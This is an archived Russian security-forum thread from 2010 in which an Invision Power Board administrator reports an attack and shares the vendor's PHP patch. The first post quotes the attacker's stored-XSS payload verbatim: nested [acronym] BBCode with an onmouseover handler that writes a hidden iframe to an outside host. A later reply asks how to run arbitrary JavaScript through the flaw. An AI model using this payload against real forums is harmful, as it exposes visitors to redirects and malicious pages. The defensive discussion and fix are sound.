ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Пытаются ломануть через тег ipb
  #1  
Старый 07.03.2010, 14:41
Аватар для goha
goha
Новичок
Регистрация: 16.11.2009
Сообщений: 6
Провел на форуме:
30843

Репутация: 0
По умолчанию Пытаются ломануть через тег ipb

Есть форум ipb 2 3 6

один пользователь прислал в ЛС некое сообщение, при прокрутке скролом страницы перекинуло на другой сайт и вернуло обратно. В подписи юзера оказался следующий код

Код HTML:
[color="#EEF2F7"][acronym=test1[acronym=test2 onmouseover=document.write("\x3Ciframe\x20src=http://****.freehostia.com/\x20frameborder=0\x20width=1024\x20height=3186\x20scrolling=no\x3E\x3C/iframe\x3E");document.close(); ]_]___________________________________________________________________________[/acronym]_[/acronym][/color]

вот как работает тег акронима:
Код:
[acronym='Laugh Out Loud']lol[/acronym]


<acronym title='{option}'>{content}</acronym>
Как защититься и что делать?

Последний раз редактировалось goha; 30.03.2010 в 19:06..
 
Ответить с цитированием

  #2  
Старый 07.03.2010, 15:19
Аватар для goha
goha
Новичок
Регистрация: 16.11.2009
Сообщений: 6
Провел на форуме:
30843

Репутация: 0
По умолчанию

вот похоже

http://forum.antichat.ru/threadnav10119-1-10.html

похожий способ взлома

Напишите кто знает как это в ipb прикрыть
 
Ответить с цитированием

  #3  
Старый 07.03.2010, 17:30
Аватар для POS_troi
POS_troi
Познавший АНТИЧАТ
Регистрация: 01.12.2006
Сообщений: 1,769
Провел на форуме:
3718311

Репутация: 1118


Отправить сообщение для POS_troi с помощью ICQ
По умолчанию

добавь фильтрацию параметров - передаваемых в acronym
 
Ответить с цитированием

  #4  
Старый 07.03.2010, 23:04
Аватар для goha
goha
Новичок
Регистрация: 16.11.2009
Сообщений: 6
Провел на форуме:
30843

Репутация: 0
По умолчанию

Мозг вещь хорошая но еще нужны знания, у меня их нет чтобы баг фиксануть

http://forums.ibresource.ru/index.php?showtopic=60138

Вон, как показывает практика уязвимы все двойки ipb, я думаю баг знающие люди найдут способ и к тройке применить
 
Ответить с цитированием

  #5  
Старый 08.03.2010, 19:56
Аватар для goha
goha
Новичок
Регистрация: 16.11.2009
Сообщений: 6
Провел на форуме:
30843

Репутация: 0
По умолчанию

Официальный фикс xss с акронимом в 2.3.6

Изменения

sources/classes/bbcode/class_bbcode_core.php

найти

Код:
# XSS Check: Bug ID: 980
							if ( $row['bbcode_tag'] == 'post' OR $row['bbcode_tag'] == 'topic' OR $row['bbcode_tag'] == 'snapback' )
							{
								$match[ $_option ][$i] = intval( $match[ $_option ][$i] );
							}
Добавить ниже

Код:
							# XSS acronym
							if ( $row['bbcode_tag'] == 'acronym' )
							{
								$match[ $_option ][$i]  = preg_replace( "/s((\\\|\)*)t((\\\|\)*)y((\\\|\)*)l((\\\|\)*)e((\\\|\)*)=/is", "st yle=", $match[ $_option ][$i] );
								$match[ $_option ][$i]  = str_replace( array( ':', ';' ), '', $match[ $_option ][$i] );
								$match[ $_content ][$i] = preg_replace( "/s((\\\|\)*)t((\\\|\)*)y((\\\|\)*)l((\\\|\)*)e((\\\|\)*)=/is", "st yle=", $match[ $_content ][$i] );
								$match[ $_content ][$i] = str_replace( array( ':', ';' ), '', $match[ $_content ][$i] );
							}
И это все.
 
Ответить с цитированием

  #6  
Старый 09.04.2010, 21:22
Аватар для Totgeliebt
Totgeliebt
Познающий
Регистрация: 20.10.2009
Сообщений: 38
Провел на форуме:
125847

Репутация: 5
По умолчанию

кто разобрался как ява скрипт через эту XSS произвести?
 
Ответить с цитированием

  #7  
Старый 09.04.2010, 23:05
Аватар для warlok
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию

Цитата:
Сообщение от Totgeliebt  
кто разобрался как ява скрипт через эту XSS произвести?
http://forum.antichat.ru/showthread.php?p=997624
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как можно просмотреть ник через id в IPB 1.3 final? Debra Форумы 19 08.03.2007 21:51
Получение шела через Cgi приложения k00p3r Чужие Статьи 0 08.06.2005 15:04
Как можно загрузить шелл в ipb через смайлики? dyx Форумы 3 14.05.2005 14:04
Залить шелл через подделку http запросов, на примере ipb 1.3 SURRENDER Форумы 25 13.04.2005 15:37
Как залить шелл через IPB форум, при отсутствии ftp? bbmz Форумы 1 26.11.2004 18:15



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ